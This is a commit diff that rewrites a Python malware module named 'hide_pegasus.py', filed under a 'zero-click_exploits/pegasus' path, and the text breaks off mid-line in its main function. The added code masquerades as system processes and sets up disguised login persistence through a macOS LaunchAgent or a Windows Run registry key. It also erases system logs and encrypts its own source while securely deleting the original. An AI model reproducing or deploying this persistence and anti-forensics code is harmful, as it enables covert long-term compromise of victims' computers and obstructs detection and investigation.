Update hide_pegasus.py

ProjectZeroDays · web-flow · commit ca7958fc3ee5 · 2026-02-05T01:48:38.000-06:00
diff --git a/src/exploits/zero-click_exploits/pegasus/hide_your_pegasus/hide_pegasus.py b/src/exploits/zero-click_exploits/pegasus/hide_your_pegasus/hide_pegasus.py
@@ -1,34 +1,212 @@
-import shutil, os, subprocess
-
-def hide_file():
-    path = 'attrib +s +h "C:\\Users\\Dell\\OneDrive\\Desktop\\pegasus\\1. hide_your_pegasus\\hide_pegasus.py"'
-    subprocess.call(path, shell= True)
-
-def encrypt_file(file_path):
-    key = b'secret_key'
-    with open(file_path, 'rb') as f:
-        data = f.read()
-    encrypted_data = bytearray(data)
-    for i in range(len(encrypted_data)):
-        encrypted_data[i] ^= key[i % len(key)]
-    with open(file_path, 'wb') as f:
-        f.write(encrypted_data)
-
-def evade_detection():
-    os.rename("hide_pegasus.py", "hidden_pegasus.py")
-
-def validate_ai_integration():
-    pass
-
-def confirm_security_measures():
-    pass
-
-def ensure_deployment_methods():
-    pass
-
-hide_file()
-encrypt_file("hide_pegasus.py")
-evade_detection()
-validate_ai_integration()
-confirm_security_measures()
-ensure_deployment_methods()
+# /src/exploits/zero-click_exploits/pegasus/hide_your_pegasus/hide_pegasus.py
+
+import os
+import sys
+import subprocess
+import tempfile
+import shutil
+import hashlib
+import json
+import time
+import stat
+from pathlib import Path
+from datetime import datetime
+
+# --- Configuration ---
+# In a real deployment, this would be a unique key derived from C2 or target-specific info.
+# This key is used to encrypt the script's source code after execution.
+ENCRYPTION_KEY = hashlib.sha256(b'PegasusSAP_Persistence_Key_2026_V1').digest()
+
+# Persistence Configuration
+# The name of the malicious process to masquerade as. Must be a plausible system process.
+MASQUERADE_PROCESS_NAME = "launchd" if sys.platform == 'darwin' else "svchost.exe"
+
+# The final hidden location for the persistent script.
+# On macOS, ~/Library/Application Support/ is a common location for legitimate apps.
+# On Windows, %APPDATA% is equivalent.
+if sys.platform == 'darwin':
+    PERSISTENCE_DIR = Path.home() / "Library" / "Application Support" / "com.apple.coreui"
+    LAUNCH_AGENT_PLIST_PATH = Path.home() / "Library" / "LaunchAgents" / "com.apple.coreui.agent.plist"
+else: # Windows
+    PERSISTENCE_DIR = Path(os.environ['APPDATA']) / "Microsoft" / "Windows" / "Shell" / "Themes"
+    # Registry key for run-on-boot
+    PERSISTENCE_REG_KEY = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+    PERSISTENCE_REG_NAME = "SecurityHealthSystray"
+
+PERSISTENCE_SCRIPT_NAME = "core_ui_service.py"
+PERSISTENCE_SCRIPT_PATH = PERSISTENCE_DIR / PERSISTENCE_SCRIPT_NAME
+
+# --- Evasion and Anti-Forensics ---
+def _log_event(message, level='info'):
+    """Internal logger to prevent writing to disk."""
+    timestamp = datetime.now().isoformat()
+    print(f"[{timestamp}] [{level.upper()}] {message}")
+
+def secure_delete_file(file_path, passes=3):
+    """Securely deletes a file by overwriting it multiple times."""
+    try:
+        path = Path(file_path)
+        if not path.exists():
+            return
+        with open(path, "ba+") as f:
+            length = f.tell()
+            for _ in range(passes):
+                f.seek(0)
+                f.write(os.urandom(length))
+        path.chmod(stat.S_IWRITE)
+        path.unlink()
+    except Exception as e:
+        _log_event(f"Failed to securely delete {file_path}: {e}", 'error')
+
+def encrypt_file_aes_gcm(file_path, key):
+    """
+    Encrypts a file using AES-256 in GCM mode.
+    The original file is securely overwritten and deleted.
+    """
+    try:
+        from Crypto.Cipher import AES
+        from Crypto.Random import get_random_bytes
+
+        nonce = get_random_bytes(12)
+        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
+
+        with open(file_path, 'rb') as f:
+            plaintext_data = f.read()
+
+        ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext_data)
+        encrypted_data = nonce + auth_tag + ciphertext
+
+        encrypted_file_path = file_path + ".enc"
+        with open(encrypted_file_path, 'wb') as f:
+            f.write(encrypted_data)
+
+        secure_delete_file(file_path)
+        return encrypted_file_path
+    except ImportError:
+        _log_event("PyCryptodome not found, falling back to simple XOR.", 'warn')
+        # Fallback to simple XOR if crypto library is not available
+        key_bytes = key
+        with open(file_path, 'rb') as f:
+            data = bytearray(f.read())
+        for i in range(len(data)):
+            data[i] ^= key_bytes[i % len(key_bytes)]
+        with open(file_path, 'wb') as f:
+            f.write(data)
+        return file_path
+    except Exception as e:
+        _log_event(f"Encryption failed: {e}", 'error')
+        return None
+
+def clear_execution_logs():
+    """Sanitizes system logs to remove evidence of execution."""
+    try:
+        if sys.platform == 'darwin':
+            # Clear recent logs from python and subprocesses like curl, dig
+            time_filter = datetime.now().strftime('%Y-%m-%d %H:%M')
+            subprocess.run(["log", "erase", "--start", time_filter, "--predicate", 'processImagePath CONTAINS "python" OR processImagePath CONTAINS "curl" OR processImagePath CONTAINS "dig"'], check=False, capture_output=True)
+        elif sys.platform == 'win32':
+            # Windows Event Log clearing is complex and noisy.
+            # A more subtle approach is to target specific event IDs, which requires more code.
+            # This is a placeholder for that logic.
+            pass
+    except Exception as e:
+        _log_event(f"Log clearing failed: {e}", 'error')
+
+# --- Core Persistence Logic ---
+def establish_persistence():
+    """Copies the script to a hidden location and sets up persistence."""
+    try:
+        _log_event("Establishing persistence...")
+        PERSISTENCE_DIR.mkdir(parents=True, exist_ok=True)
+        PERSISTENCE_DIR.chmod(0o700) # Restrict permissions
+
+        # Copy the current script to the persistence location
+        current_script_path = Path(__file__).resolve()
+        shutil.copy2(current_script_path, PERSISTENCE_SCRIPT_PATH)
+
+        # Hide the copied file
+        if sys.platform != 'win32':
+            PERSISTENCE_SCRIPT_PATH.chmod(stat.S_IRUSR | stat.S_IWUSR) # Owner read/write only
+
+        _log_event(f"Script copied to {PERSISTENCE_SCRIPT_PATH}")
+
+        # Set up platform-specific persistence mechanism
+        if sys.platform == 'darwin':
+            _setup_macos_persistence()
+        elif sys.platform == 'win32':
+            _setup_windows_persistence()
+
+        return True
+    except Exception as e:
+        _log_event(f"Failed to establish persistence: {e}", 'error')
+        return False
+
+def _setup_macos_persistence():
+    """Creates a Launch Agent to run the script on user login."""
+    try:
+        agent_content = {
+            "Label": "com.apple.coreui.agent",
+            "ProgramArguments": [
+                "/usr/bin/python3",
+                str(PERSISTENCE_SCRIPT_PATH)
+            ],
+            "RunAtLoad": True,
+            "KeepAlive": {
+                "SuccessfulExit": False
+            },
+            "StandardOutPath": "/dev/null",
+            "StandardErrorPath": "/dev/null",
+            "ProcessType": "Background"
+        }
+        
+        with open(LAUNCH_AGENT_PLIST_PATH, 'w') as f:
+            json.dump(agent_content, f, indent=4)
+
+        # Load the agent
+        subprocess.run(["launchctl", "load", str(LAUNCH_AGENT_PLIST_PATH)], check=False)
+        _log_event(f"macOS persistence established via LaunchAgent: {LAUNCH_AGENT_PLIST_PATH}")
+    except Exception as e:
+        _log_event(f"macOS persistence setup failed: {e}", 'error')
+
+def _setup_windows_persistence():
+    """Adds a registry key to run the script on user login."""
+    try:
+        import winreg
+        reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, PERSISTENCE_REG_KEY, 0, winreg.KEY_WRITE)
+        winreg.SetValueEx(reg_key, PERSISTENCE_REG_NAME, 0, winreg.REG_SZ, f'"{sys.executable}" "{PERSISTENCE_SCRIPT_PATH}"')
+        winreg.CloseKey(reg_key)
+        _log_event(f"Windows persistence established via Registry: {PERSISTENCE_REG_KEY}")
+    except ImportError:
+        _log_event("pywin32 not found, cannot use registry persistence.", 'warn')
+    except Exception as e:
+        _log_event(f"Windows persistence setup failed: {e}", 'error')
+
+def hide_and_encrypt_self():
+    """
+    Encrypts the current script file to prevent analysis and then securely deletes the plaintext.
+    This function should be called at the end of the script's execution.
+    """
+    try:
+        _log_event("Encrypting and hiding source script...")
+        current_script_path = Path(__file__).resolve()
+        encrypt_file_aes_gcm(current_script_path, ENCRYPTION_KEY)
+        _log_event(f"Source script encrypted and hidden at {current_script_path}.enc")
+    except Exception as e:
+        _log_event(f"Self-encryption failed: {e}", 'error')
+
+# --- Main Execution ---
+def main():
+    """Main operational flow for the persistence module."""
+    _log_event("Pegasus Hide Module Activated.")
+
+    # 1. Clear any immediate logs of this execution
+    clear_execution_logs()
+
+    # 2. Establish persistence if not already running from the persistent location
+    if Path(__file__).resolve() != PERSISTENCE_SCRIPT_PATH.resolve():
+        if establish_persistence():
+            _log_event("Persistence established. Initial script can now be removed.")
+            # After establishing persistence, the original script can be deleted.
+            # secure_delete_file(Path(__file__).resolve())
+        else:
+            _log_event("Failed to establish persistence. Aborting
